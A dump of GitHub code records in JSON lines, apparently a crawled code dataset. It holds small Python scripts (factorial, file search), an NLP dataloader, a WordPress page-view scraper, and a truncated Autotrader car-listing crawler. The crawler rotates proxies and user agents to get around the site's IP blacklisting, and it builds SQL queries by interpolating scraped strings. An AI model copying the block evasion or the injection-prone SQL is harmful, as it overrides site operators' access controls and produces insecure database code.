str('sim')\nresposta = str('sim')\n\nwhile not resposta != continua:\n fat = 1\n\n n = int(input('Qual o fatorial?: '))\n\n for fatorial in range(1, n + 1):\n fat = fatorial * fat\n\n print(fat)\n resposta = str(input('Deseja continuar?: ').lower())\n\nprint('Programa encerrado a pedido do usuário.')\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"livro_algoritmos/fatorail_interativo.py","file_name":"fatorail_interativo.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17590532778","text":"import flair \nimport torch\nimport numpy as np \nimport spacy\nimport transformers\nimport os, sys, time\nfrom tqdm import tqdm\nimport psutil\nimport pickle\nimport gensim\n\nfrom constants import spacy_pos_dict, spacy_model_names, gensim_fasttext_models\n\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\ndef print_memory_usage(label):\n process = psutil.Process(os.getpid())\n #print(process.memory_info())\n mem = process.memory_info().rss / 1024 / 1024\n print (\"{} using {:.2f} MB memory!\".format(label, mem))\n\nclass DataLoader():\n def __init__(self, split, args):\n self.args = args\n self.pos_tags = spacy_pos_dict[args.lang]\n if args.lm == \"bertmulti\":\n self.emb_dim = 768\n elif args.lm == \"fasttext\":\n self.emb_dim = 100\n else:\n self.emb_dim = -1\n cache_dataset_head = \"cache/{}_{}_{}_{}\".format(args.lang, args.lm, split, args.task)\n if os.path.exists(cache_dataset_head):\n pass\n #print (\"{} exists. Loading the datasets.\".format(cache_dataset_head))\n else:\n print (\"Generating dataset in {}\".format(cache_dataset_head))\n os.makedirs(cache_dataset_head)\n self._generate_data_pairs(split, cache_dataset_head, args)\n filelist_short = os.listdir(cache_dataset_head)\n self.ckpt_filelist = [os.path.join(cache_dataset_head, fn_short) for fn_short in filelist_short]\n self.ckpt_ptr = 0\n # self.x and self.y are loaded from the checkpoint in ckpt_filelist[self.ckpt_ptr]\n self.x = []\n self.y = [] \n self.ptr = 0 # iterates through self.x and self.y\n self.reset()\n\n if split == \"train\":\n self.batch_size = args.batch_size\n else:\n self.batch_size = 1\n\n def _generate_data_pairs(self, split, cache_dataset_head, args):\n \"\"\"\n Return CPU torch tensors\n \"\"\"\n # Corpus\n if args.lang == \"en\": \n corpus = flair.datasets.UD_ENGLISH()\n elif args.lang == \"fr\":\n corpus = flair.datasets.UD_FRENCH()\n elif args.lang == \"es\":\n corpus = flair.datasets.UD_SPANISH()\n else:\n raise ValueError\n if split == \"train\":\n corpus_split = corpus.train \n elif split == \"dev\":\n corpus_split = corpus.dev \n elif split == \"test\":\n corpus_split = corpus.test \n else:\n raise ValueError(\"split {} not accepted!\".format(split))\n\n # SpaCy tagger\n spacy_nlp = spacy.load(spacy_model_names[args.lang])\n\n # Word Embedding (huggingface)\n if args.lm == \"bertmulti\":\n emb_tag = \"bert-base-multilingual-cased\"\n tokenizer = transformers.BertTokenizer.from_pretrained(emb_tag)\n emb = transformers.BertModel.from_pretrained(emb_tag)\n self.emb_dim = emb.config.hidden_size\n elif args.lm == \"fasttext\":\n tokenizer = BaselineTokenizer()\n emb = gensim.models.FastText(gensim_fasttext_models[args.lang])\n self.emb_dim = 100\n elif args.lm == \"glove\":\n raise NotImplementedError\n else:\n raise ValueError(\"lm {} not supported\".format(args.lm))\n\n start_time = time.time()\n dumpcnt = 1\n all_x = []\n all_y = []\n for doc_id, article in enumerate(corpus_split):\n raw_s = article.to_plain_string()\n sent_x, sent_y = self._process_sentence(raw_s, spacy_nlp, tokenizer, emb, args)\n all_x += sent_x\n all_y += sent_y\n if doc_id>0 and doc_id % 1024 == 0:\n self._process_dump(all_x, all_y, cache_dataset_head, dumpcnt, args.task)\n all_x = []\n all_y = []\n dumpcnt += 1\n print (\"Processed {} docs in {:.2f} seconds. Cacheing...\".format(doc_id, time.time() - start_time))\n print_memory_usage(f\"docid {doc_id}\")\n self._process_dump(all_x, all_y, cache_dataset_head, dumpcnt, args.task)\n print (\"Finished processing and cached {} docs in {:.2f} seconds.\".format(len(corpus_split), time.time() - start_time))\n\n def _process_dump(self, all_x, all_y, cache_dataset_head, dumpcnt, task):\n all_x_tensors = torch.cat(all_x, dim=0).to(device) # (N, D)\n all_y_tensors = torch.cat(all_y).to(device) # (N,)\n\n if args.task == \"probe\":\n pass \n elif args.task == \"ctarget\":\n rand_y_tensors = torch.LongTensor(np.random.randint(0, len(self.pos_tags), all_y_tensors.shape)).to(device)\n all_y_tensors = rand_y_tensors \n elif args.task == \"crep\":\n all_x_tensors = torch.FloatTensor(np.random.normal(0, 1, all_x_tensors.shape)).to(device)\n else:\n raise ValueError(\"Task {} not accepted!\".format(args.task))\n\n cache_name = os.path.join(cache_dataset_head, f\"{dumpcnt}.pt\")\n with open(cache_name, \"wb+\") as f:\n pickle.dump({\n \"x\": all_x_tensors,\n \"y\": all_y_tensors\n }, f)\n\n return all_x_tensors, all_y_tensors\n\n def _process_sentence(self, raw_s, spacy_nlp, tokenizer, emb, args):\n spacy_tokens = spacy_nlp(raw_s)\n spacy_token_texts = [token.text_with_ws for token in spacy_tokens]\n hf_tokens = tokenizer.tokenize(raw_s)\n clean_hf_tokens = []\n for token in hf_tokens:\n if token.startswith(\"##\"):\n clean_hf_tokens.append(token[2:])\n else:\n clean_hf_tokens.append(token)\n cost, s2h, h2s, s2h_multi, h2s_multi = spacy.gold.align(spacy_token_texts, clean_hf_tokens)\n\n BERT_MAX_LEN = 510\n sent_x = []\n sent_y = []\n\n while len(hf_tokens) > BERT_MAX_LEN:\n hf_tokens_head = hf_tokens[:BERT_MAX_LEN]\n hf_tokens_rem = hf_tokens[BERT_MAX_LEN:]\n h2s_head = h2s[:BERT_MAX_LEN]\n h2s_rem = h2s[BERT_MAX_LEN:]\n h2s_rem = (np.array(h2s_rem) - BERT_MAX_LEN).tolist()\n\n spacy_tokens_head = spacy_tokens[:h2s[BERT_MAX_LEN]]\n spacy_tokens_rem = spacy_tokens[h2s[BERT_MAX_LEN]:]\n s2h_head = s2h[:h2s[BERT_MAX_LEN]]\n s2h_rem = s2h[:h2s[BERT_MAX_LEN]]\n s2h_rem = (np.array(s2h_rem) - h2s[BERT_MAX_LEN]).tolist()\n \n chunk_x, chunk_y = self._align_chunk(hf_tokens_head, h2s_head, spacy_tokens_head, s2h_head, tokenizer, emb)\n sent_x += chunk_x \n sent_y += chunk_y \n\n hf_tokens = hf_tokens_rem \n h2s = h2s_rem \n spacy_tokens = spacy_tokens_rem \n s2h = s2h_rem \n chunk_x, chunk_y = self._align_chunk(hf_tokens, h2s, spacy_tokens, s2h, tokenizer, emb)\n sent_x += chunk_x \n sent_y += chunk_y\n return sent_x, sent_y \n\n def _align_chunk(self, hf_tokens_head, h2s_head, spacy_tokens_head, s2h_head, tokenizer, emb):\n chunk_x = []\n chunk_y = []\n # Ok now that *_head does not overflow\n # Process the doc and alignments\n if self.args.lm == \"bertmulti\":\n hf_indices_head = tokenizer.encode(hf_tokens_head) # list of int\n vecs, _ = emb(torch.tensor(hf_indices_head).unsqueeze(0))\n # vecs is [1, seq_len, ndim]\n elif self.args.lm == \"fasttext\":\n vecs = torch.tensor(np.array([emb.wv[w] for w in hf_tokens_head])).unsqueeze(0)\n else:\n raise NotImplementedError\n \n # Just traverse the spacy tokenization\n # When there is a miss, find the corresponding miss at hf tokenization\n # Handle the missing parts. Then repeat at subseq no-miss at spacy sequence\n i, j = 0, -1\n while i < len(s2h_head):\n if s2h_head[i] > 0:\n j = s2h_head[i]\n x = vecs[:, j] # x is tensor of shape (1, d_emb)\n y = self._pos_to_label(spacy_tokens_head[i].pos_)\n chunk_x.append(x)\n chunk_y.append(y)\n i += 1\n else:\n start_i, end_i = i, i+1\n while end_i < len(s2h_head) and s2h_head[end_i] < 0:\n end_i += 1\n if end_i == len(s2h_head):\n break\n i = end_i\n if end_i > start_i + 1: # Multiple spacy misses. Skip them\n j = s2h_head[end_i]\n continue \n else: # Only one spacy miss. Find corresponding hf misses\n # Note1: j corresponds to the *previous* value\n # Note2: end_j will at most be len(h2s_head)\n start_j, end_j = j+1, j+2\n while end_j < len(h2s_head) and h2s_head[end_j] < 0:\n end_j += 1\n x = torch.mean(vecs[:, start_j:end_j], dim=1)\n y = self._pos_to_label(spacy_tokens_head[i].pos_)\n chunk_x.append(x)\n chunk_y.append(y)\n\n return chunk_x, chunk_y \n\n def has_next(self):\n return self.ckpt_ptr < len(self.ckpt_filelist)-1 or self.ptr + self.batch_size <= len(self.x)\n\n def next(self):\n if self.ptr + self.batch_size < len(self.x):\n start = self.ptr \n end = start + self.batch_size \n xbatch, ybatch = self.x[start: end], self.y[start: end]\n self.ptr = end\n elif self.ckpt_ptr < len(self.ckpt_filelist)-1:\n self.ckpt_ptr += 1\n self.x, self.y = self._load_file(self.ckpt_ptr)\n start, end = 0, self.batch_size\n xbatch, ybatch = self.x[start: end], self.y[start: end]\n self.ptr = end \n else:\n return None, None\n return xbatch, ybatch\n\n def _pos_to_label(self, pos_tag):\n if self.args.lang == \"fr\":\n if pos_tag == \"INTJ\":\n pos_tag = \"X\"\n elif pos_tag == \"SYM\":\n pos_tag = \"X\"\n elif self.args.lang == \"es\":\n if pos_tag == \"X\":\n pos_tag = \"INTJ\"\n return torch.LongTensor([self.pos_tags.index(pos_tag)])\n\n def reset(self):\n self.ckpt_ptr = 0\n self.ptr = 0\n self.x, self.y = self._load_file(self.ckpt_ptr)\n\n def _load_file(self, ckpt_ptr):\n with open(self.ckpt_filelist[ckpt_ptr], \"rb\") as f:\n checkpoint = pickle.load(f)\n return checkpoint[\"x\"], checkpoint[\"y\"]\n\n\nclass BaselineTokenizer:\n def __init__(self):\n pass \n\n def tokenize(self, s):\n \"\"\"\n Input: s (a string representation of a sentence)\n Output: tokens (list of string). \n \"\"\"\n return s.split()\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--lm\", type=str, choices=[\"bertmulti\", \"fasttext\", \"glove\"], default=\"bertmulti\")\n parser.add_argument(\"--lang\", type=str, choices=[\"en\", \"es\", \"fr\"], default=\"en\")\n parser.add_argument(\"--task\", type=str, choices=[\"probe\", \"ctarget\", \"crep\"], default=\"probe\")\n\n parser.add_argument(\"--split\", type=str, choices=[\"train\", \"dev\", \"test\"], default=\"dev\")\n parser.add_argument(\"--batch_size\", type=int, default=1)\n args = parser.parse_args()\n \n dl = DataLoader(args.split, args)\n\n print(\"dl.has_next():\", dl.has_next())\n\n print (\"Checking if device is on GPU\")\n x_tensor, y_tensor = dl.next()\n print(\"x_tensor.shape:\", x_tensor.shape)\n print(\"y_tensor.shape:\", y_tensor.shape)\n print(\"x_tensor.device:\", x_tensor.device)\n print(\"y_tensor.device:\", y_tensor.device)\n\n print (\"Checking NaN for this dataset\")\n dl.reset()\n success = True \n while dl.has_next():\n x_tensor, y_tensor = dl.next()\n if x_tensor is None:\n break \n if torch.isnan(x_tensor).sum() > 0:\n print (\"x_tensor has nan entries! Stopping!\")\n success = False \n break\n if torch.isnan(y_tensor).sum() > 0:\n print (\"y_tensor has nan entries! Stopping!\")\n success = False \n break\n if success:\n print (\"NaN test passed!\")\n else:\n print (\"NaN test failed!\")\n \n print (\"Compute H(T)\")\n import scipy\n from scipy.stats import entropy\n dl.reset()\n labels = []\n while dl.has_next():\n x_tensor, y_tensor = dl.next()\n if x_tensor is None:\n break\n labels += y_tensor.cpu().numpy().tolist()\n ent = entropy(labels, base=2)\n print (\"H(T)={:.4f}\".format(ent))","repo_name":"SPOClab-ca/InfoProbe","sub_path":"src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":12629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39415495281","text":"import os\n\n# Algoritmo para percorrer os arquivos dentro de um caminho de diretórios e localizar um ou mais arquivos a partir do termo procurado.\n\ncaminho_procura = input('Digite um caminho: ')\ntermo_procura = input('Digite um termo: ')\n\n\ndef formata_tamanho(size):\n base = 1024\n kilo = base\n mega = base**2\n giga = base**3\n tera = base**4\n peta = base**5\n\n if size < kilo:\n # na primeira verificação não é necessário manipular o valor de `size`\n texto = 'B'\n elif size < mega:\n size /= kilo\n texto = 'K'\n elif size < giga:\n size /= mega\n texto = 'M'\n elif size < tera:\n size /= giga\n texto = 'G'\n elif size < peta:\n size /= tera\n texto = 'T'\n else:\n size /= peta\n texto = 'P'\n size = round(size, 2)\n return f'{size}{texto}'.replace('.', ',')\n\n\ncontador_de_arquivos = 0\nfor raiz, diretorios, arquivos in os.walk(caminho_procura):\n for arquivo in arquivos:\n if termo_procura in arquivo:\n try:\n contador_de_arquivos += 1\n caminho_completo = os.path.join(raiz, arquivo)\n nome_arquivo, ext_arquivo = os.path.splitext(arquivo)\n tamanho = os.path.getsize(caminho_completo)\n\n print()\n print(f'Encontrei o arquivo: {arquivo}')\n print(f'Caminho: {caminho_completo}')\n print(f'Nome: {nome_arquivo}')\n print(f'Extensão: {ext_arquivo}')\n print(f'Tamanho: {tamanho}')\n print(f'Tamanho formatado: {formata_tamanho(tamanho)}')\n except PermissionError as e:\n print('Sem permissão.')\n except FileNotFoundError as e:\n print('Arquivo não encontrado.')\n except Exception as e:\n print('Erro desconhecido: ', e)\n\nprint()\nprint(f'{contador_de_arquivos} arquivo(s) encontrado(s).')\n\n\n# Quando houver barras invertidas no caminho informado (no caso do Windows) é necessário urilizar o `r` antes da string com o caminho:\n\n# caminho_windows = r'C:\\programs\\anything'\n","repo_name":"renatodev95/curso-python","sub_path":"secao5-modulos-python/os1.py","file_name":"os1.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16091511448","text":"from selenium import webdriver\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\nfrom time import sleep\r\nimport datetime\r\nimport gspread\r\nimport json\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport schedule\r\n\r\nmail_username = 'wordpress account mail or username'\r\npassword = 'wordpress account password'\r\nwp_edit = 'https://your URL.dmain/wp-admin/edit.php'\r\n\r\ndate_number = 2\r\ndef check_pv():\r\n scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']\r\n credentials = ServiceAccountCredentials.from_json_keyfile_name('mywp2v-505293b83604.json', scope)\r\n gc = gspread.authorize(credentials)\r\n SPREADSHEET_KEY = '1Rs8Q01HwJdBPLrxme60rBSZm5aUR8pm6CkQNZzZ-r9w'\r\n worksheets = gc.open_by_key(SPREADSHEET_KEY).worksheets()\r\n worksheet = worksheets[0]\r\n worksheet2 = worksheets[1]\r\n\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('--headless')\r\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=options)\r\n driver.get(wp_edit)\r\n global mail_username\r\n driver.find_element_by_id('user_login').send_keys(mail_username)\r\n global password\r\n driver.find_element_by_id('user_pass').send_keys(password)\r\n driver.find_element_by_id('wp-submit').click()\r\n global date_number\r\n all_id = driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[1]/div[3]/span[1]').text\r\n all_id = all_id.replace('個の項目','')\r\n title_list = []\r\n id_list = []\r\n pv_list = []\r\n if date_number == 1:\r\n sheet_num = int(all_id) + 1\r\n n = 1\r\n while True:\r\n try:\r\n title_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[1]/strong/a'\r\n id_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[8]'\r\n pv_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[7]'\r\n title = driver.find_element_by_xpath(title_path).text\r\n id = driver.find_element_by_xpath(id_path).text\r\n pv = driver.find_element_by_xpath(pv_path).text\r\n pv = pv.replace(' ビュー','')\r\n print(f'タイトル={title}・ID={id}、PV={pv}')\r\n print(f'n={n}・sheet_num={sheet_num}')\r\n worksheet.update_cell(sheet_num,1,title)\r\n #worksheet2.update_cell(sheet_num,1,title)\r\n worksheet.update_cell(sheet_num,2,id)\r\n #worksheet2.update_cell(sheet_num,2,id)\r\n worksheet.update_cell(sheet_num,3,pv)\r\n if n == 1:\r\n date = datetime.datetime.now().strftime('%m/%d')\r\n worksheet.update_cell(1,3,date)\r\n if n % 50 == 0 :\r\n driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[2]/div[3]/span[2]/a[1]').click()\r\n sleep(1)\r\n n = 0\r\n sheet_num -= 1\r\n n += 1\r\n sleep(2)\r\n except:\r\n break\r\n\r\n else:\r\n sheet_num = int(all_id) + 1\r\n print(sheet_num)\r\n n = 1\r\n column_number = date_number + 2\r\n while True:\r\n try:\r\n title_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[1]/strong/a'\r\n id_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[8]'\r\n pv_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[7]'\r\n title = driver.find_element_by_xpath(title_path).text\r\n id = int(driver.find_element_by_xpath(id_path).text)\r\n pv = driver.find_element_by_xpath(pv_path).text\r\n pv = int(pv.replace(' ビュー',''))\r\n title_list.append(title)\r\n id_list.append(id)\r\n pv_list.append(pv)\r\n title_data = worksheet.cell(sheet_num,2).value\r\n if title_data == id:\r\n worksheet.update_cell(sheet_num,column_num,pv)\r\n else:\r\n worksheet.update_cell(sheet_num,1,title)\r\n sleep(0.5)\r\n worksheet2.update_cell(sheet_num,1,title)\r\n worksheet.update_cell(sheet_num,2,id)\r\n sleep(0.5)\r\n worksheet2.update_cell(sheet_num,2,id)\r\n worksheet.update_cell(sheet_num,column_number,pv)\r\n if n == 1:\r\n date = datetime.datetime.now().strftime('%m/%d')\r\n column_num = date_number + 2\r\n worksheet.update_cell(1,column_num,date)\r\n if n % 50 == 0 :\r\n driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[2]/div[3]/span[2]/a[1]').click()\r\n sleep(1)\r\n n = 0 \r\n n += 1\r\n sleep(1)\r\n a = date_number + 1\r\n b = date_number + 2\r\n c = date_number + 1\r\n day1_pv = worksheet.cell(sheet_num,a).value\r\n day1 = worksheet.cell(1,a).value\r\n day2_pv = worksheet.cell(sheet_num,b).value\r\n day2 = worksheet.cell(1,b).value\r\n print(f'aは{a}、bは{b}、cは{c}、sheet_numは{sheet_num}')\r\n print(f'day1={day1_pv}、day2={day2_pv}')\r\n day1_pv = int(day1_pv)\r\n day2_pv = int(day2_pv)\r\n day2_day1 = day2_pv - day1_pv\r\n worksheet2.update_cell(sheet_num, c, day2_day1)\r\n date_data = str(day1)+'~'+str(day2)\r\n worksheet2.update_cell(1, c, date_data)\r\n sheet_num -= 1\r\n sleep(1)\r\n except:\r\n break\r\n\r\n date_number += 1\r\n driver.quit()\r\n\r\ncheck_pv()\r\n#schedule.every().day.at('14:50').do(check_pv)\r\n#schedule.every(3).minutes.do(check_pv)\r\n# while True:\r\n# schedule.run_pending()\r\n# sleep(1)\r\n","repo_name":"Mr-SuperInsane/WP2V","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75151447208","text":"\nfrom django.conf.urls import url,include\nfrom . import views\nurlpatterns = [\nurl(r'author/', views.authorView.as_view(),name='author'),\nurl(r'authordetail/(?P[0-9]+)',views.authordetail.as_view(),name='authordetail'),\n url(r'bookdetail/(?P[0-9]+)',views.bookdetail.as_view(),name='bookdetail'),\n\nurl(r'',views.Index.as_view(),name='book'),\n\n]\n","repo_name":"krishnapriya-mk/Library-app","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26322609027","text":"import queue\nfrom bs4 import BeautifulSoup\nimport mysql.connector\nimport os\nimport time\nfrom threading import Thread, Lock\nfrom datetime import datetime\nimport logging\nimport requests\nimport argparse\nimport random\nimport re\n\ndef get_q(rng):\n\n\tQ = queue.Queue(1000)\n\tfor page in range(0,max_index*100,100):\n\t\turl = \"https://www.autotrader.ca/cars/?rcp=100&rcs={}&srt=33&pRng={}%2C{}&prx=-1&loc=V3J%203S9&hprc=\\\n\t\t\tTrue&wcp=True&sts=New-Used&inMarket=advancedSearch\\\n\t\t\t\".format(page,price_range[rng][0],price_range[rng][1])\n\t\tQ.put(url)\n\n\treturn Q\n\ndef get_proxies(num, wait):\n\n\tos.system('> proxies.txt')\n\tos.system('timeout '+str(wait)+'s '+'proxybroker find --types HTTPS --lvl High --countries US CA --strict -l '+ str(num) +' > proxies.txt')\n\n\twith open('proxies.txt','r') as proxy_file:\n\t\tproxy_list = proxy_file.readlines()\n\n\treturn proxy_list\n\ndef parse_proxies(proxy_list, protocol):\n\tparsed_list = list();\n\tfor proxy in proxy_list:\n\t\tproxy.strip()\n\t\tindex = proxy.find(']')\n\t\tparsed_list.append(protocol+'://'+proxy[index+2:len(proxy)-2])\n\tprint(parsed_list)\n\treturn parsed_list\n\nclass Crawler(Thread):\n\t#class variables\n\theaders = ['Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n\t\t 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',\n\t\t 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',\n\t\t 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',\n\t\t 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15]']\n\n\tconn = mysql.connector.connect(user=os.environ['USER_NAME'], passwd=os.environ['PASSWORD'], host=os.environ['HOST_NAME'],database=os.environ['DATABASE'])\n\tproxies = None\n\ttimout = None\n\n\tdef __init__(self, outside_proxy, main_Q, worker_Q, timeout):\n\t\tThread.__init__(self)\n\t\t#instance variables\n\t\t#connection/page objects\n\t\tself.req = None\n\t\tself.content = None\n\t\tself.bsObj = None\n\t\tself.path = None\n\t\tself.debug = None\n\t\tself.init_proxies(outside_proxy)\n\t\tself.init_timeout(timeout)\n\t\t#page structures\n\t\tself.bsParse = []\n\t\tself.links = []\n\t\tself.vehicles = []\n\t\t#proxy structures\n\t\tself.main_Q = main_Q\n\t\tself.worker_Q = worker_Q\n\n\tdef gather_links(self):\n\n\t\tself.bsParse = self.bsObj.findAll('div', {'class':'listing-details organic'})\n\t\tfor tag in self.bsParse:\n\t\t\tif 'href' in tag.a.attrs: self.links.append('https://www.autotrader.ca'+ tag.a.attrs['href'])\n\n\tdef init_timeout(self, timeout):\n\t\tCrawler.timeout = timeout\n\n\tdef init_proxies(self, outside_proxy):\n\t\tCrawler.proxies = outside_proxy\n\n\tdef update_request(self,link):\n\n\t\tself.req = None\n\t\twhile str(self.req) != '':\n\n\t\t\ttime.sleep(Crawler.timeout)\n\t\t\ttry:\n\t\t\t\tproxy = random.choice(Crawler.proxies)\n\t\t\t\tself.req = requests.get(link,headers={'user-agent':random.choice(self.headers)}, proxies={'https':proxy}, timeout=10)\n\n\t\t\texcept (requests.exceptions.Timeout, requests.exceptions.ConnectTimeout):\n\t\t\t\tprint(\"{} connection timeout using ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\tif proxy in Crawler.proxies:\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\texcept requests.exceptions.RequestException:\n\t\t\t\tprint(\"{} other connection issue using ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\tif proxy in Crawler.proxies:\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\telse:\n\t\t\t\tself.content = self.req.content\n\t\t\t\tself.bsObj = BeautifulSoup(self.content,'lxml')\n\n\t\t\t\tif len(self.bsObj.findAll('head',attrs={'name':'ROBOTS'}))!=0:\n\t\t\t\t\tprint(\"{} blacklisted ip: {} ... Dropping from proxies ...\".format(self.getName(), proxy))\n\t\t\t\t\tCrawler.proxies.remove(proxy)\n\t\t\t\t\tself.req = None\n\n\t\t\t\tif len(str(self.content)) <= 1000: self.req = None\n\n\tdef check_page_index(self):\n\t\t#get current page\n\t\tself.bsParse = str(self.bsObj.findAll('script',limit=25)[18:25])\n\t\tstart_index = self.bsParse.rfind('\"CurrentPage\":')\n\t\tcurrent_page = self.bsParse[start_index+15:start_index+18]\n\t\t#get max page\n\t\tstart_index = self.bsParse.rfind('\"MaxPage\":')\n\t\tmax_page = self.bsParse[start_index+11:start_index+14]\n\n\t\tif not current_page or not max_page:\n\t\t\tprint('------------------- NO CURRENT OR MAX PAGE -------------------')\n\t\t\tlogging.warning(\"NO CURRENT OR MAX PAGE\")\n\t\t\tprint('--------------------------------------------------------------')\n\t\t\treturn False\n\t\telse:\n\t\t\tif current_page[-1]==',': current_page = current_page[:-1]\n\n\t\tif current_page[0] == '0':\n\t\t\t#Past last page CurrentPage and Lastpage is 0\n\t\t\treturn True\n\t\telif int(current_page) < int(max_page):\n\t\t\tprint(self.path)\n\t\t\tprint('{} {}'.format(current_page,max_page))\n\t\t\treturn False\n\t\telse:\n\t\t\tprint('{} {}'.format(current_page,max_page))\n\t\t\treturn True\n\n\tdef update_db(self, data):\n\n\t\tcursor = self.conn.cursor()\n\t\tfor row in data:\n\n\t\t\tcur_time = datetime.now()\n\t\t\tformated = cur_time.strftime('%Y-%m-%d %H:%M:%S')\n\t\t\trow['full vehicle'] = row['make']+' '+row['model']+' '+row['year']\n\n\t\t\tvalues = (row['adID'],row['adType'],row['condition'], row['make'], row['model'], row['price'], row['province'],\n\t\t\trow['city'], row['year'], row['kilometres'], row['exterior colour'], row['fuel type'], row['body type'], row['full vehicle'])\n\n\t\t\tsql_autotrader = \"\"\"INSERT INTO main(adID, adType, `condition`, make, model, price, province, city, `year`, kilometers, exterior_color, fuel_type, body_type, full_vehicle)\n\t\t\t\t\t\t\t\tVALUES('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s');\"\"\"%(values)\n\n\t\t\tsql_turnover = \"\"\"INSERT INTO time(adID, time_entered, time_updated)\n\t\t\t\t\t\t\t VALUES('%s','%s',%s)\n\t\t\t\t\t\t\t ON DUPLICATE KEY UPDATE time_updated = '%s';\"\"\"%(row['adID'],formated,'NULL',formated)\n\n\t\t\tsql_vehicle_image = \"\"\"\n\t\t\t\t\t\t\t\tINSERT IGNORE INTO vehicle_image(full_vehicle, image_path) VALUES('%s',NULL);\n\t\t\t\t\t\t\t\t\"\"\"%(row['full vehicle'])\n\n\t\t\tsql_adjusted_price = \"\"\"\n\t\t\t\t\t\t\t\tINSERT INTO price_change(adID, adjusted_price, time_updated)\n\t\t\t\t\t\t\t\tVALUES('%s', '%s', '%s')\n\t\t\t\t\t\t\t\tON DUPLICATE KEY UPDATE adjusted_price = '%s', time_updated = '%s';\"\"\"%(row['adID'], row['price'], formated, row['price'], formated)\n\n\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_autotrader)\n\t\t\t\tself.conn.commit()\n\t\t\texcept:\n\t\t\t\tself.conn.rollback()\n\t\t\t\ttry:\n\t\t\t\t\tcursor.execute(sql_adjusted_price)\n\t\t\t\texcept:\n\t\t\t\t\tself.conn.rollback()\n\t\t\telse:\n\t\t\t\tcursor.execute(sql_vehicle_image)\n\t\t\t\tself.conn.commit()\n\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_turnover)\n\t\t\t\tself.conn.commit()\n\t\t\texcept:\n\t\t\t\tself.conn.rollback()\n\n\t\tcursor.close()\n\n\tdef gather_details(self):\n\n\t\tself.vehicles = []\n\n\t\t#TODO: Include error handling for empty links\n\t\tfor link in self.links:\n\n\t\t\tvehicle_details = {'adID':'','adType':'','condition':'','make':'','model':'','price':'','province':'','city':'',\n\t\t\t\t\t'year':'','kilometres':'','exterior colour':'','fuel type':'','body type':''}\n\n\t\t\tself.update_request(link)\n\t\t\t#collect data from gtmManager.initializeDataLayer\n\t\t\tself.bsParse = self.bsObj.findAll('script',limit=3)\n\n\t\t\ttry:\n\t\t\t\tdetails = re.sub('\"','',self.bsParse[2].text)\n\t\t\texcept:\n\t\t\t\tlogging.warning(\"gtmManager.initializeDataLayer method is not available in source for this listing at url: {}\".format(link))\n\t\t\t\tcontinue\n\n\t\t\tdetails = re.split(',|:|{',details)\n\t\t\tdetails = 